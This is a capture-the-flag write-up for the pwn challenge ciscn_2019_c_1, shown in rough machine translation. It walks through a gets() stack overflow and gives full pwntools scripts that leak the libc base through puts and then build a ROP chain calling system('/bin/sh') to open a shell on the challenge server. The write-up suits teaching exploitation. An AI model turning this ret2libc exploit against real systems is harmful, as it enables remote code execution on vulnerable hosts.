当前位置:网站首页>ciscn_ 2019_ c_ one
ciscn_ 2019_ c_ one
2022-07-23 23:33:00 【Long street 395】
List of articles
One 、 see file
file ciscn_2019_c_1 View file format :
checksec ciscn_2019_c_1 View file protection :
64 position ,NX And ASLR It's all on , No, it's for nothing
Two 、IDA Decompile
We find two main functions :
main:
encrypt():
However, no callsystem Backdoor function , opened NX You need to build it yourself ROP chain .
The basic idea :encrypt() Inside get() Can overflow , The stack size is 50h.puts() Can be used to reveal libc Base address .
Find out Get Function has overflow point offest=0x50+8
We go through Ropgadget find pop_rdi_rdi Address :0x400c83
3、 ... and 、 The code to build
exp:
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26336)
elf=ELF("./ciscn_2019_c_1")
ret=0x400c83
plt=elf.plt['puts']
got=elf.got['puts']
main_addr=0x400B28
r.recv()
r.sendline("1")
r.recvuntil("encrypted\n")
p=flat("a"*0x58)+p64(ret)+p64(got)+p64(plt)+p64(main_addr)
r.sendline(p)
r.recvuntil("Ciphertext\n")
r.recvuntil("\n")
addr=u64(r.recv(6).ljust(0x8,b"\x00"))
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")
print(libcbase)
Libc Base address :
Continue building :
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26336)
elf=ELF("./ciscn_2019_c_1")
ret=0x400c83
plt=elf.plt['puts']
got=elf.got['puts']
main_addr=0x400B28
r.recv()
r.sendline(b"1")
r.recvuntil(b"encrypted\n")
p=b"a"*0x58+p64(ret)+p64(got)+p64(plt)+p64(main_addr)
r.sendline(p)
r.recvuntil(b"Ciphertext\n")
r.recvuntil(b"\n")
addr=u64(r.recv(6).ljust(0x8,b"\x00"))
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")
print(libcbase)
r.recv()
r.sendline(b"1")
r.recvuntil(b"encrypted\n")
sys_addr=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
res=0x4006b9
p1=b"a"*0x58+p64(res)+p64(ret)+p64(bin_sh)+p64(sys_addr)
r.sendline(p1)
r.interactive()
After this step, you can get flag 了
direct cat flag:
But I encountered such a problem here :
timeout: the monitored command dumped core
At this time, he has many choices :
Let's try another option
summary
It's really annoying , I met three different types of questions today , bolt Q 了 .
边栏推荐
- AutoCAD advanced operation
- 1、 Simplification of digital logic
- BUUCTF -rip
- BGP基础实验
- A deserialized CTF question sharing
- 第七章、测试架构元素
- 关于使用 Jackson 解析 JSON 你需要知道的一切
- Open source embedded sig in the openeuler community. Let's talk about its multi OS hybrid deployment framework
- Resolved (selenium operation Firefox Firefox browser error) attributeerror: 'webdriver' object has no attribute 'execute_ cdp_ cmd’
- 第五章、实现Web适配器
猜你喜欢
This article will show you what typescript is
bjdctf_2020_babystack
warmup_csaw_2016
![48: Chapter 5: develop admin management service: 1: create sub project [imooc news dev Service Admin], management service module;](/img/c5/dfdabdd8181e9e6118dbf968e3e19f.png)
48: Chapter 5: develop admin management service: 1: create sub project [imooc news dev Service Admin], management service module;
Lin Zhiying's injury is relatively stable
ArraysList 与顺序表 ——模拟实现
Chinese NFT? NFR was born
树形DP
FreeRTOS personal notes - suspend / unhook tasks
Android金九银十的面试你准备的怎么样了?最新Android面试真题汇总助你备战
随机推荐
Android金九银十的面试你准备的怎么样了?最新Android面试真题汇总助你备战
Detailed explanation of pseudo instructions in assembly language (with examples)
solo 文章标题会过滤掉部分标签
Three network modes of VMware virtual machine
ret2text
[leetcode ladder] linked list · 206 reverse linked list
汇编语言伪指令详解(附实例)
头插法创建链表并输出所有元素
Structured Streaming 编程模型(Input Table、Result Table、Output Mode...)
js把数字转大写
SecureCRT garbled
warmup_csaw_2016
anchor free yolov1
Mongodb database + graphical tools download, installation and use
The I2C interface mode offline burning operation method of h7-tool has been released (2022-07-16)
DGS的错误处理
史上最全的2022年版Android面试题
DGS之联邦(Federation)
ret2text
48: Chapter 5: develop admin management service: 1: create sub project [imooc news dev Service Admin], management service module;